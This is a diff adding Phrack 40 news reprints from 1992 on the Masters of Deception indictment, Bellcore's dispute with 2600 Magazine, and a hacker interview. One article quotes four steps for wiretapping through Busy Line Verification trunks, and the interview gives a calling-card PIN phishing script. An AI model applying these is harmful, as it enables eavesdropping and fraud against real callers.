+soared.  For example, Robert Tappan Morris, a Cornell student, unleashed a
+program in 1988 that jammed several thousand computers across the country.
+
+A Polyglot Group
+
+But the world of computer hackers has been changing.  Unlike the typical
+hackers of old -- well-to-do suburban youths whose parents could afford costly
+equipment -- the Masters of Deception are a polyglot representation of blue-
+collar New York: black, Hispanic, Greek, Lithuanian and Italian.  They work
+their mischief often using the least expensive computers.
+
+One of the young men, 21-year-old John Lee, who goes by the name Corrupt, has
+dreadlocks chopped back into stubby "twists," and lives with his mother in a
+dilapidated walk-up in Bedford-Stuyvesant, Brooklyn.  He bounced around
+programs for gifted students before dropping out of school in the 11th grade.
+Scorpion -- 22-year-old Paul Stira of Queens -- was his class valedictorian at
+Thomas A. Edison High School in Queens.  Outlaw -- Julio Fernandez, 18, of the
+Bronx -- first studied computers in grade school.
+
+They met not on street corners, but via computer bulletin boards used to swap
+messages and programs.
+
+With nothing to identify them on the boards except their nicknames and uncanny
+abilities, the young men found the computer the great democratic leveler.
+
+Questions of Profit
+
+There may be another difference in the new wave of hackers.  While the
+traditional hacker ethic forbids cruising computer systems for profit, some new
+hackers are less idealistic.  "People who say that," said one former hacker, a
+friend of the MOD who insisted on anonymity, "must have rich parents.  When you
+get something of value, you've got to make money."
+
+Mr. Lee, Mr. Fernandez, Mr. Stira and two others described as MOD members --
+20-year-old Mark Abene (Phiber Optik), and 22-year-old Elias Ladopoulos (Acid
+Phreak), both of Queens -- were charged with crimes including computer
+tampering, computer and wire fraud, illegal wiretapping and conspiracy.  They
+face huge fines and up to five years in prison on each of 11 counts.
+
+The youths, on advice of their lawyers, declined to be interviewed.
+
+Prosecutors say they do not know just how and when youthful pranks turned to
+serious crime.  Other hackers said the trouble began, perhaps innocently
+enough, as a computer war with ethnic and class overtones.
+
+The Masters of Deception were born in a conflict with the Legion of Doom, which
+had been formed by 1984 and ultimately included among its ranks three Texans,
+one of whom, Kenyon Shulman, is the son of a Houston socialite, Carolyn Farb.
+
+Banished From the Legion
+
+Mr. Abene had been voted into the Legion at one point.  But when he began to
+annoy others in the group with his New York braggadocio and refusal to share
+information, he was banished, Legion members said.
+
+Meanwhile, a hacker using a computer party line based in Texas had insulted Mr.
+Lee, who is black, with a racial epithet.
+
+By 1989, both New Yorkers had turned to a new group, MOD, founded by Mr.
+Ladopoulos.  They vowed to replace their Legion rivals as the "new elite."
+
+"It's like every other 18- or 19-year-old who walks around knowing he can do
+something better than anyone else can," said Michael Godwin, who knows several
+of the accused and is a lawyer for the Electronic Frontier Foundation of
+Cambridge, Massachusetts, which provides legal aid for hackers.  "They are
+offensively arrogant."
+
+Hacker groups tend to rise and fall within six months or so as members leave
+for college, meet girls or, as one former hacker put it, "get a life."  But the
+MOD continued to gather new members from monthly meetings in the atrium of the
+Citicorp Building in Manhattan and a computer bulletin board called Kaos.
+According to a history the group kept on the computer network, they enjoyed
+"mischievous pranks," often aimed at their Texas rivals, and the two groups
+began sparring.
+
+Texas-New York Sparring
+
+But in June 1990, the three Texas-based Legion members, including Mr. Shulman,
+Chris Goggans and Scott Chasin, formed Comsec Data Security, a business
+intended to help companies prevent break-ins by other hackers.
+
+Worried that the Texans were acting as police informers, the MOD members
+accused their rivals of defaming them on the network bulletin boards.  Several
+members, including Mr. Abene, had become targets of raids by the Secret
+Service, and MOD members believed the Texans were responsible, a contention the
+Texans respond to with "no comment."
+
+But the sparring took on racial overtones as well.  When Mr. Lee wrote a
+history of the MOD and left it in the network, Mr. Goggans rewrote it in a jive
+parody.
+
+The text that read, "In the early part of 1987, there were numerous amounts of
+busts in the U.S. and in New York in particular" became "In de early time part
+uh 1987, dere wuz numerous amounts uh busts in de U.S. and in New Yo'k in
+particular."
+
+Mr. Goggans said that it was not meant as a racist attack on Mr. Lee.  "It was
+just a good way to get under his skin," he said.
+
+Exposing Identities
+
+MOD's activities, according to the indictment and other hackers, began to
+proliferate.
+
+Unlike most of the "old generation" of hackers who liked to joyride through the
+systems, the New Yorkers began using the file information to harass and
+intimidate others, according to prosecutors.  Everything from home addresses to
+credit card numbers to places of employment to hackers' real names -- perhaps
+the biggest taboo of all -- hit the network.
+
+In the indictment, Mr. Lee and Mr. Fernandez are accused of having a
+conversation last fall in which they talked about getting information on how to
+alter TRW credit reports to "destroy people's lives or make them look like
+saints."
+
+The prosecutors say the youths also went after information they could sell,
+though the indictment is not specific about what, if anything, was sold.  The
+only such information comes from another case earlier this month in which two
+other New York City hackers, Morton Rosenfeld, 21, of Brooklyn, and Alfredo de
+la Fe, 18, of Manhattan, pleaded guilty to a conspiracy to use passwords and
+other access devices obtained from MOD.  They said they had paid "several
+hundred dollars" to the computer group for passwords to obtain credit reports
+and then resold the information for "several thousand dollars" to private
+investigators.
+
+News Media Attention
+
+Competition for attention from the news media also heated up.  The former
+Legion members in Comsec had become media darlings, with articles about them
+appearing in Time and Newsweek.  Mr. Abene and Mr. Ladopoulos also appeared on
+television or in magazines, proclaiming their right to probe computer systems,
+as long as they did no damage.
+
+In one highly publicized incident, during a 1989 forum on computers and privacy
+sponsored by Harper's magazine, John Perry Barlow, a freelance journalist and
+lyricist for the Grateful Dead, went head to head with Mr. Abene, or Phiber
+Optik.  Mr. Barlow called the young  hacker a "punk."
+
+According to an article by Mr. Barlow -- an account that Mr. Abene will not
+confirm or deny -- Mr. Abene then retaliated by "downloading" Mr. Barlow's
+credit history, displaying it on the computer screens of Mr. Barlow and other
+network users.
+
+Skirmishes Subside
+
+"I've been in redneck bars wearing shoulder-length curls, police custody while
+on acid, and Harlem after midnight, but no one has ever put the spook in me
+quite as Phiber Optik did at that moment," Mr. Barlow wrote.  "To a middle-
+class American, one's credit rating has become nearly identical to his
+freedom."
+
+In recent months, hackers say, the war has calmed down.  Comsec went out of
+business, and several Masters of Deception were left without computers after
+the Secret Service raids.
+
+Mr. Abene pleaded guilty last year to misdemeanor charges resulting from the
+raids.  On the night before his arrest this month, he gave a guest lecture on
+computers at the New School for Social Research.
+
+Mr. Lee says he works part time as a stand-up comic and is enrolled at Brooklyn
+College studying film production.
+
+Mr. Stira is three credits shy of a degree in computer science at Polytechnic
+University in Brooklyn.  Mr. Fernandez hopes to enroll this fall in the
+Technical Computer Institute in Manhattan.  Mr. Ladopoulos is studying at
+Queens Community College.
+
+No trial date has been set.
+
+But the battles are apparently not over yet.  A couple of days after the
+charges were handed up, one Legion member said, he received a message on his
+computer  from Mr. Abene.  It was sarcastic as usual, he said, and it closed,
+"Kissy, kissy."
+
+[Editor's Note:  Article included photographs of Phiber Optik, Scorpion,
+                 Corrupt, and Outlaw.]
+_______________________________________________________________________________
+
+ Frustrated Hackers May Have Helped Feds In MOD Sting             July 20, 1992
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ By James Daly (ComputerWorld)(Page 6)
+
+NEW YORK -- Are hackers beginning to police themselves?  The five men recently
+charged with cracking into scores of complex computer systems during the last
+two years may have been fingered by other hackers who had grown weary of the
+group's penchant for destruction and vindictiveness, members of the hacker
+community said.
+
+The arrest of the defendants, whom federal law enforcement officials claimed
+were members of a confederation variously called the "Masters of Deception" and
+the "Masters of Disaster" (MOD), was cause for celebration in some quarters
+where the group is known as a spiteful fringe element.
+
+"Some of these guys were a big pain," said one source who requested anonymity
+for fear that unindicted MOD members would plot revenge.  "They used their
+skills to harass others, which is not what hacking is all about.  MOD came with
+a 'you will respect us' attitude, and no one liked it."
+
+Said another: "In the past few months, there has been a lot of muttering on the
+[bulletin] boards about these guys."
+
+In one episode, MOD members reportedly arranged for the modem of a computer at
+the University of Louisville in Kentucky to continually dial the home number of
+a hacker bulletin board member who refused to grant them greater access
+privileges.  A similar threat was heard in Maryland.
+
+In the indictment, the defendants are accused of carrying on a conversation in
+early November 1991 in which they sought instructions on how to add and remove
+credit delinquency reports "to destroy people's lives . . . or make them look
+like a saint."  Unlike many other hacker organizations, the members of MOD
+agreed to share important computer information only among themselves and not
+with other hackers.
+
+Officials Mum
+
+Who exactly helped the FBI, Secret Service and U.S. Attorney General's Office
+prepare a case against the group is still anyone's guess.  Assistant U.S.
+Attorney Stephen Fishbein is not saying.  He confirmed that the investigation
+into the MOD began in 1990, but he would not elaborate on how or why it was
+launched or who participated.  FBI and Secret Service officials were equally
+mute.
+
+
+Some observers said that if the charges are true, the men were not true
+"hackers" at all.
+
+"Hacking is something done in the spirit of creative playfulness, and people
+who break into computer security systems aren't hackers -- they're criminals,"
+said Richard Stallman, president of the Cambridge, Massachusetts-based Free
+Software Foundation, a public charity that develops free software.  The
+foundation had several files on one computer deleted by a hacker who some
+claimed belonged to the MOD.
+
+The MOD hackers are charged with breaking into computer systems at several
+regional telephone companies, Fortune 500 firms including Martin Marietta
+Corp., universities and credit-reporting concerns such as TRW, Inc., which
+reportedly had 176 consumer credit reports stolen and sold to private
+investigators.  The 11-count indictment accuses the defendants of computer
+fraud, computer tampering, wire fraud, illegal wiretapping and conspiracy.
+
+But some hackers said the charges are like trying to killing ants with a
+sledgehammer.  "These guys may have acted idiotically, but this was a stupid
+way to get back at them," said Emmanuel Goldstein, editor of 2600, a quarterly
+magazine for the hacker community based in Middle Island, New York.
+
+Longtime hackers said the MOD wanted to move into the vacuum left when the
+Legion of Doom began to disintegrate in late 1989 and early 1990 after a series
+of arrests in Atlanta and Texas.  Federal law enforcement officials have
+described the Legion of Doom as a group of about 15 computer enthusiasts whose
+members re-routed calls, stole and altered data and disrupted telephone
+services.
diff --git a/phrack40/14.txt b/phrack40/14.txt
new file mode 100644
index 0000000..de0bca9
--- /dev/null
+++ b/phrack40/14.txt
@@ -0,0 +1,944 @@
+                                ==Phrack Inc.==
+
+                    Volume Four, Issue Forty, File 14 of 14
+
+              PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+              PWN                                             PWN
+              PWN              Phrack World News              PWN
+              PWN                                             PWN
+              PWN           Issue 40 / Part 3 of 3            PWN
+              PWN                                             PWN
+              PWN        Compiled by Datastream Cowboy        PWN
+              PWN                                             PWN
+              PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+
+
+ Bellcore Threatens 2600 Magazine With Legal Action               July 15, 1992
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+THE FOLLOWING CERTIFIED LETTER HAS BEEN RECEIVED BY 2600 MAGAZINE.  WE WELCOME
+ANY COMMENTS AND/OR INTERPRETATIONS.
+
+Leonard Charles Suchyta
+General Attorney
+Intellectual Property Matters
+
+Emanuel [sic] Golstein [sic], Editor
+2600 Magazine
+P.O. Box 752
+Middle Island, New York 11953-0752
+
+Dear Mr. Golstein:
+
+It has come to our attention that you have somehow obtained and published in
+the 1991-1992 Winter edition of 2600 Magazine portions of certain Bellcore
+proprietary internal documents.
+
+This letter is to formally advise you that, if at any time in the future you
+(or your magazine) come into possession of, publish, or otherwise disclose any
+Bellcore information or documentation which either (i) you have any reason to
+believe is proprietary to Bellcore or has not been made publicly available by
+Bellcore or (ii) is marked "proprietary," "confidential," "restricted," or with
+any other legend denoting Bellcore's proprietary interest therein, Bellcore
+will vigorously pursue all legal remedies available to it including, but not
+limited to, injunctive relief and monetary damages, against you, your magazine,
+and its sources.
+
+We trust that you fully understand Bellcore's position on this matter.
+
+Sincerely,
+
+
+LCS/sms
+
+
+LCS/CORR/JUN92/golstein.619
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+ Emmanuel Goldstein Responds
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~
+The following reply has been sent to Bellcore.  Since we believe they have
+received it by now, we are making it public.
+
+Emmanuel Goldstein
+Editor, 2600 Magazine
+PO Box 752
+Middle Island, NY 11953
+
+July 20, 1992
+
+Leonard Charles Suchyta
+LCC 2E-311
+290 W. Mt. Pleasant Avenue
+Livingston, NJ 07039
+
+Dear Mr. Suchyta:
+
+We are sorry that the information published in the Winter 1991-92 issue of 2600
+disturbs you.  Since you do not specify which article you take exception to, we
+must assume that you're referring to our revelation of built-in privacy holes
+in the telephone infrastructure which appeared on Page 42.  In that piece, we
+quoted from an internal Bellcore memo as well as Bell Operating Company
+documents. This is not the first time we have done this.  It will not be the
+last.
+
+We recognize that it must be troubling to you when a journal like ours
+publishes potentially embarrassing information of the sort described above.
+But as journalists, we have a certain obligation that cannot be cast aside
+every time a large and powerful entity gets annoyed.  That obligation compels
+us to report the facts as we know them to our readers, who have a keen interest
+in this subject matter.  If, as is often the case, documents, memoranda, and/or
+bits of information in other forms are leaked to us, we have every right to
+report on the contents therein.  If you find fault with this logic, your
+argument lies not with us, but with the general concept of a free press.
+
+And, as a lawyer specializing in intellectual property law, you know that you
+cannot in good faith claim that merely stamping "proprietary" or "secret" on a
+document establishes that document as a trade secret or as proprietary
+information.  In the absence of a specific explanation to the contrary, we must
+assume that information about the publicly supported telephone system and
+infrastructure is of public importance, and that Bellcore will have difficulty
+establishing in court that any information in our magazine can benefit
+Bellcore's competitors, if indeed Bellcore has any competitors.
+
+If in fact you choose to challenge our First Amendment rights to disseminate
+important information about the telephone infrastructure, we will be compelled
+to respond by seeking all legal remedies against you, which may include
+sanctions provided for in Federal and state statutes and rules of civil
+procedure.  We will also be compelled to publicize your use of lawsuits and the
+threat of legal action to harass and intimidate.
+
+Sincerely,
+
+Emmanuel Goldstein
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+ Exposed Hole In Telephone Network Draws Ire Of Bellcore          July 24, 1992
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ Taken from Communications Daily (Page 5)
+
+                         Anyone Can Wiretap Your Phone
+
+Major security hole in telephone network creates "self-serve" monitoring
+feature allowing anyone to listen in on any telephone conversation they choose.
+Weakness involves feature called Busy Line Verification (BLV), which allows
+phone companies to "break into" conversation at any time.  BLV is used most
+often by operators entering conversation to inform callers of emergency
+message.  But BLV feature can be used by anyone with knowledge of network's
+weakness to set up ad hoc 'wiretap' and monitor conversations, said Emmanuel
+Goldstein, editor of 2600 Magazine, which published article in its Winter 1991
+issue.
+
+2600 Magazine is noted for finding and exposing weaknesses of
+telecommunications.  It's named for frequency of whistle, at one time given
+away with Cap'n Crunch cereal, which one notorious hacker discovered could,
+when blown into telephone receiver, allow access to open 800 line.  Phone
+companies have since solved that problem.
+
+Security risks are outlined in article titled "U.S. Phone Companies Face Built-
+In Privacy Hole" that quotes from internal Bellcore memo and Bell Operating Co.
+documents: "'A significant and sophisticated vulnerability' exists that could
+affect the security and privacy of BLV." Article details how, after following 4
+steps, any line is susceptible to secret monitoring.  One document obtained by
+2600 said: "There is no proof the hacker community knows about the
+vulnerability."
+
+When Bellcore learned of article, it sent magazine harsh letter threatening
+legal action.  Letter said that if at any time in future magazine "comes into
+possession of, publishes, or otherwise discloses any Bellcore information"
+organization will "vigorously pursue all legal remedies available to it
+including, but not limited to, injunctive and monetary damages."  Leonard
+Suchyta, Bellcore General Attorney for Intellectual Property Matters, said
+documents in magazine's possession "are proprietary" and constitute "a trade
+secret" belonging to Bellcore and its members -- RBOCs.  He said documents are
+"marked with 'Proprietary' legend" and "the law says you can't ignore this
+legend, its [Bellcore's] property."  Suchyta said Bellcore waited so long to
+respond to publication because "I think the article, as we are not subscribers,
+was brought to our attention by a 3rd party."  He said this is first time he
+was aware that magazine had published such Bellcore information.
+
+But Goldstein said in reply letter to Bellcore: "This is not the first time we
+have done this.  It will not be the last."  He said he thinks Bellcore is
+trying to intimidate him, "but they've come up against the wrong publication
+this time."  Goldstein insisted that documents were leaked to his magazine:
+"While we don't spread the documents around, we will report on what's contained
+within."  Suchyta said magazine is obligated to abide by legend stamped on
+documents.  He said case law shows that the right to publish information hinges
+on whether it "has been lawfully acquired.  If it has a legend on it, it's sort
+of hard to say it's lawfully acquired."
+
+Goldstein said he was just making public what already was known: There's known
+privacy risk because of BLV weakness: "If we find something out, our first
+instinct is to tell people about it.  We don't keep things secret."  He said
+information about security weaknesses in phone network "concerns everybody."
+Just because Bellcore doesn't want everyone to know about its shortcomings and
+those of telephone network is hardly reason to stifle that information,
+Goldstein said.  "Everybody should know if their phone calls can be listened in
+on."
+
+Suchyta said that to be considered "valuable," information "need not be of
+super, super value," like proprietary software program "where you spent
+millions of dollars" to develop it.  He said information "could well be your
+own information that would give somebody an advantage or give them some added
+value they wouldn't otherwise have had if they had not taken it from you."
+Goldstein said he was "sympathetic" to Bellcore's concerns but "fact is, even
+when such weaknesses are exposed, [phone companies] don't do anything about
+them."  He cited recent indictments in New York where computer hackers were
+manipulating telephone, exploiting weaknesses his magazine had profiled long
+ago.  "Is there any security at all [on the network]?" he said.  "That's the
+question we have to ask ourselves."
+
+Letter from Bellcore drew burst of responses from computer community when
+Goldstein posted it to electronic computer conference.  Lawyers specializing in
+computer law responded, weighing in on side of magazine.  Attorney Lance Rose
+said: "There is no free-floating 'secrecy' right . . . Even if a document says
+'confidential' that does not mean it was disclosed to you with an understanding
+of confidentiality -- which is the all-important question."  Michael Godwin,
+general counsel for Electronic Frontier Foundation, advocacy group for the
+computer community, said: "Trade secrets can qualify as property, but only if
+they're truly trade secrets.  Proprietary information can (sort of) qualify as
+property if there's a breach of a fiduciary duty."  Both lawyers agreed that
+magazine was well within its rights in publishing information.  "If Emmanuel
+did not participate in any way in encouraging or aiding in the removal of the
+document from Bellcore . . . that suggests he wouldn't be liable," Godwin said.
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+ Bellcore And 2600 Dispute Publishing Of Article                  July 27, 1992
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ By Barbara E. McMullen & John F. McMullen (Newsbytes)
+
+MIDDLE ISLAND, NY -- Eric Corley a/k/a "Emmanuel Goldstein", editor and
+publisher of 2600 Magazine: The Hacker Quarterly, has told Newsbytes that he
+will not be deterred by threats from Bellcore from publishing material which he
+considers important for his readership.
+
+Earlier this month, Corley received a letter (addressed to "Emanuel Golstein")
+from Leonard Charles Suchyta, General Attorney, Intellectual Property Matters
+at Bellcore taking issue with the publication by 2600 of material that Suchyta
+referred to as "portions of certain Bellcore proprietary internal documents."
+
+The letter continued "This letter is to formally advise you that, if at any
+time in the future you (or your magazine) come into possession of, publish, or
+otherwise disclose any Bellcore information or documentation which either (i)
+you have any reason to believe is proprietary to Bellcore or has not been made
+publicly available by Bellcore or (ii) is marked "proprietary," "confidential,"
+"restricted," or with any other legend denoting Bellcore's proprietary interest
+therein, Bellcore will vigorously pursue all legal remedies available to it
+including, but not limited to, injunctive relief and monetary damages, against
+you, your magazine, and its sources."
+
+While the letter did not mention any specific material published by 2600,
+Corley told Newsbytes that he believes that Suchyta's letter refers to an
+article entitled "U.S. Phone Companies Face Built-In Privacy Hole".that appears
+on page 42 of the Winter 1991 issue.  Corley said "What we published was
+derived from a 1991 internal Bellcore memo as well as Bell Operating Company
+documents that were leaked to us.  We did not publish the documents.  However,
+we did read what was sent to us and wrote an article based upon that.  The
+story focuses on how the phone companies are in an uproar over a 'significant
+and sophisticated vulnerability' that could result in BLV (busy line
+verification) being used to listen in on phone calls."
+
+The 650-word article said, in part, "By exploiting a weakness, it's possible
+to remotely listen in on phone conversations at a selected telephone number.
+While the phone  companies can do this any time they want, this recently
+discovered self-serve monitoring feature has created a telco crisis of sorts."
+
+The article further explained how people might exploit the security hole,
+saying "The intruder can listen in on phone calls by following these four
+steps:
+
+"1. Query the switch to determine the Routing Class Code assigned to the BLV
+    trunk group.
+"2. Find a vacant telephone number served by that switch.
+"3. Via recent change, assign the Routing Class Code of the BLV trunks to the
+    Chart Column value of the DN (directory number) of the vacant telephone
+    number.
+"4. Add call forwarding to the vacant telephone number (Remote Call Forwarding
+    would allow remote definition of the target telephone number while Call
+    Forwarding Fixed would only allow the specification of one target per
+    recent change message or vacant line)."
+
+"By calling the vacant phone number, the intruder would get routed to the BLV
+trunk group and would then be connected on a "no-test vertical" to the target
+phone line in a bridged connection."
+
+The article added "According to one of the documents, there is no proof that
+the hacker community knows about the vulnerability.  The authors did express
+great concern over the publication of an article entitled 'Central Office
+Operations - The End Office Environment' which appeared in the electronic
+newsletter Legion of Doom/Hackers Technical Journal.  In this article,
+reference is made to the 'No Test Trunk'."
+
+The article concludes "even if hackers are denied access to this "feature",
+BLV networks will still have the capability of being used to monitor phone
+lines.  Who will be monitored and who will be listening are two forever
+unanswered questions."
+
+Corley responded to to Suchyta's letter on July 20th, saying "I assume that
+you're referring to our revelation of built-in privacy holes in the telephone
+infrastructure which appeared on Page 42.  In that piece, we quoted from an
+internal Bellcore memo as well as Bell Operating Company documents.  This is
+not the first time we have done this.  It will not be the last.
+
+"We recognize that it must be troubling to you when a journal like ours
+publishes potentially embarrassing information of the sort described above.
+But as journalists, we have a certain obligation that cannot be cast aside
+every time a large and powerful entity gets annoyed.  That obligation compels
+us to report the facts as we know them to our readers, who have a keen interest
+in this subject matter.  If, as is often the case, documents, memoranda, and/or
+bits of information in other forms are leaked to us, we have every right to
+report on the contents therein.  If you find fault with this logic, your
+argument lies not with us, but with the general concept of a free press.
+
+"And, as a lawyer specializing in intellectual property law, you know that
+you cannot in good faith claim that merely stamping "proprietary" or "secret"
+on a document establishes that document as a trade secret or as proprietary
+information.  In the absence of a specific explanation to the contrary, we must
+assume that information about the publicly supported telephone system and
+infrastructure is of public importance, and that Bellcore will have difficulty
+establishing in court that any information in our magazine can benefit
+Bellcore's competitors, if indeed Bellcore has any competitors.
+
+"If in fact you choose to challenge our First Amendment rights to disseminate
+important information about the telephone infrastructure, we will be compelled
+to respond by seeking all legal remedies against you, which may include
+sanctions provided for in Federal and state statutes and rules of civil
+procedure.  We will also be compelled to publicize your use of lawsuits and the
+threat of legal action to harass and intimidate.
+
+  Sincerely,
+  Emmanuel Goldstein"
+
+Corley told Newsbytes "Bellcore would never have attempted this with the New
+York Times.  They think that it would, however, be easy to shut us up by simple
+threats because of our size.  They are wrong.  We are responsible journalists;
+we know the rules and we abide by them.  I will, by the way, send copies of the
+article in question to anyone who request it.  Readers may then judge for
+themselves whether any boundaries have been crossed."
+
+Corley, who hosts the weekly "Off the Hook" show on New York City's WBAI radio
+station, said that he had discussed the issue on the air and had received
+universal support from his callers.  Corley also told Newsbytes, that, although
+he prefers to be known by his nomme de plume (taken from  George Orwell's
+1984), he understands that the press fells bound to use his actual name.  He
+said that, in the near future, he will "end the confusion by having my name
+legally changed."
+
+Bellcore personnel were unavailable for comment on any possible response to
+Corley's letter.
+_______________________________________________________________________________
+
+ Interview With Ice Man And Maniac                                July 22, 1992
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ By Joshua Quittner (New York Newsday)(Page 83)
+
+Ice Man and Maniac are two underground hackers in the New England area that
+belong to a group known as Micro Pirates, Incorporated.  They agreed to be
+interviewed if their actual identities were not revealed.
+
+[Editor's Note:  They are fools for doing this, especially in light of how
+                 Phiber Optik's public media statements and remarks will
+                 ultimately be used against him.]
+
+Q: How do you define computer hacking?
+
+Maniac:  Hacking is not exploration of computer systems.  It's more of an
+         undermining of security.  That's how I see it.
+
+Q: How many people are in your group, Micro Pirates Incorporated?
+
+Ice Man: Fifteen or 14.
+
+Maniac:  We stand for similar interests.  It's an escape, you know.  If I'm not
+         doing well in school, I sit down on the board and talk to some guy in
+         West Germany, trade new codes of their latest conquest.  Escape.
+         Forget about the real world.
+
+Ice Man. It's more of a hobby.  Why do it?  You can't exactly stop.  I came
+         about a year-and-a-half ago, and I guess you could say I'm one of the
+         ones on a lower rung, like in knowledge.  I do all the -- you wouldn't
+         call it dirty work -- phone calls.  I called you -- that kind of
+         thing.
+
+Q: You're a "social engineer"?
+
+Ice Man: Social engineering -- I don't know who coined the term.  It's using
+         conversation to exchange information under false pretenses.  For
+         example, posing as a telecommunications employee to gain more
+         knowledge and insight into the different [phone network] systems.
+
+Q: What social engineering have you done?
+
+Maniac:  We hacked into the system that keeps all the grades for the public
+         school system.  It's the educational mainframe at Kingsborough
+         Community College.  But we didn't change anything.
+
+Ice Man: They have the mainframe that stores all the schedules, Regents scores,
+         ID numbers of all the students in the New York high school area.  You
+         have to log in as a school, and the password changes every week.
+
+Q: How did you get the password?
+
+Ice Man: Brute force and social engineering.  I was doing some social
+         engineering in school.  I was playing the naive person with an
+         administrator, asking all these questions toward what is it, where is
+         it and how do you get in.
+ 
+Q: I bet you looked at your grades.  How did you do?
+
+Ice Man: High 80s.
+
+Q. And you could have changed Regents scores?
+
+Ice Man: I probably wouldn't have gotten away with it, and I wouldn't say I
+         chose not to on a moral basis.  I'd rather say on a security basis.
+
+Q: What is another kind of social engineering?
+
+Maniac:  There's credit-card fraud and calling-card fraud.  You call up and
+         say, "I'm from the AT&T Corporation.  We're having trouble with your
+         calling-card account.  Could you please reiterate to us your four-
+         digit PIN number?"  People, being kind of God-fearing -- as AT&T is
+         somewhat a God -- will say, "Here's my four-digit PIN number."
+
+Q:  Hackers from another group, MOD, were arrested recently and charged with,
+    among other things, selling inside information about how to penetrate
+    credit bureaus.  Have you cleaned up your act?
+
+Maniac:  We understand the dangers of it now.  We're not as into it.  We
+         understand what people go through when they find out a few thousand
+         dollars have been charged to their credit-card account.
+
+Q: Have you hacked into credit bureaus?
+
+Ice Man: We were going to look up your name.
+
+Maniac:  CBI [Credit Bureau International, owned by Equifax, one of the largest
+         national credit bureaus], is pretty insecure, to tell you the truth.
+
+Q: Are you software pirates, too?
+
+Maniac: Originally.  Way back when.
+
+Ice Man: And then we branched out and into the hacking area.  Software piracy
+         is, in the computer underground, the biggest thing.  There are groups
+         like THG and INC, which are international.  THG is The Humble Guys.
+         INC is International Network of Crackers, and I've recently found out
+         that it's run by 14 and 15-year-olds.  They have people who work in
+         companies, and they'll take the software and they'll crack it -- the
+         software protection -- and then distribute it.
+
+Q: Are there many hacking groups in New York?
+
+Maniac:  Three or four.  LOD [the Legion of Doom, named by hacker Lex Luthor],
+         MOD, MPI and MOB [Men of Business].
+
+Q: How do your members communicate?
+
+Ice Man: The communication of choice is definitely the modem [to access
+         underground electronic bulletin boards where members leave messages
+         for each other or "chat" in real time].  After that is the voice mail
+         box [VMB].  VMBs are for communications between groups.
+
+         A company, usually the same company that has beepers and pagers and
+         answering services, has a voice-mail-box service.  You call up [after
+         hacking out an access code that gives the user the ability to create
+         new voice mail boxes on a system] and can enter in a VMB number.
+         Occasionally they have outdial capabilities that allow you to call
+         anywhere in the world.  I call about five every day.  It's not really
+         my thing.
+
+Q: Is your group racially integrated?
+
+Ice Man: Half of them are Asian.  Also we have, I think, one Hispanic.  I never
+         met him.  Race, religion -- nobody cares.  The only thing that would
+         alienate you in any way would be if you were known as a lamer.  If you
+         just took, took, took and didn't contribute to the underground.  It's
+         how good you are, how you're respected.
+
+Maniac:  We don't work on a racial basis or an ethnic basis.  We work on a
+         business basis.  This is an organized hobby.  You do these things for
+         us and you get a little recognition for it.
+
+Ice Man: Yeah.  If you're a member of our group and you need a high-speed
+         modem, we'll give you one, on a loan basis.
+
+Q: How does somebody join MPI?
+
+Maniac:  They have to contact either of us on the boards.
+
+Ice Man: And I'll go through the whole thing [with them], validating them,
+         checking their references, asking them questions, so we know what
+         they're talking about.  And if it's okay, then we let them in.  We
+         have members in 516, 718, 212, 201, 408, and 908.  We're talking to
+         someone in Florida, but he's not a member yet.
+
+Q: Are any MPI members in other hacking groups?
+
+Ice Man: I know of no member of MPI that is in any other group.  I wouldn't
+         call it betrayal, but it's like being in two secret clubs at one time.
+         I would want them faithful to my group, not any other group.  There is
+         something called merging, a combination of both groups that made them
+         bigger and better.  A lot of piracy groups did that.
+
+Q: Aren't you concerned about breaking the law?
+
+Maniac:  Breaking the law?  I haven't gotten caught.  If I do get caught, I
+         won't be stupid and say I was exploring -- I'm not exploring.  I'm
+         visiting, basically.  If you get caught, you got to serve your time.
+         I'm not going to fight it.
+_______________________________________________________________________________
+
+ FBI Unit Helps Take A Byte Out Of Crime                          July 15, 1992
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ By Bill Gertz (The Washington Times)(Page A4)
+
+FBI crime busters are targeting elusive computer criminals who travel the world
+by keyboard, telephone and  computer  screen and use such code names as "Phiber
+Optik," "Masters of Disaster," "Acid Phreak" and "Scorpion."
+
+"Law enforcement across the board recognizes that this is a serious emerging
+crime problem, and it's only going to continue to grow in the future," said
+Charles L. Owens, chief of the FBI's economic crimes unit.
+
+Last week in New York, federal authorities unsealed an indictment against five
+computer hackers, ages 18 to 22, who were charged with stealing long-distance
+phone service and credit bureau information and who penetrated a wide variety
+of computer networks.
+
+The FBI is focusing its investigations on major intrusions into banking and
+government computers and when the objective is stealing money, Mr. Owens said
+in an interview.
+
+FBI investigations of computer crimes have doubled in the past year, he said,
+adding that only about 11 percent to 15 percent of computer crimes are reported
+to law enforcement agencies.  Because of business or personal reasons, victims
+often are reluctant to come forward, he said.
+
+Currently, FBI agents are working on more than 120 cases, including at least
+one involving a foreign intelligence agency.  Mr. Owens said half of the active
+cases involve hackers operating overseas, but he declined to elaborate.
+
+The FBI has set up an eight-member unit in its Washington field office devoted
+exclusively to solving computer crimes.
+
+The special team, which includes computer scientists, electrical engineers and
+experienced computer system operators, first handled the tip that led to the
+indictment of the five hackers in New York, according to agent James C. Settle,
+who directs the unit.
+
+Computer criminals, often equipped with relatively unsophisticated Commodore 64
+or Apple II computers, first crack into international telephone switching
+networks to make free telephone calls anywhere in the world, Mr. Settle said.
+
+Hackers then can spend up to 16 hours a day, seven days a week, breaking into
+national and international computer networks such as the academic-oriented
+Internet, the National Aeronautics and Space Administration's Span-Net and the
+Pentagon's Milnet.
+
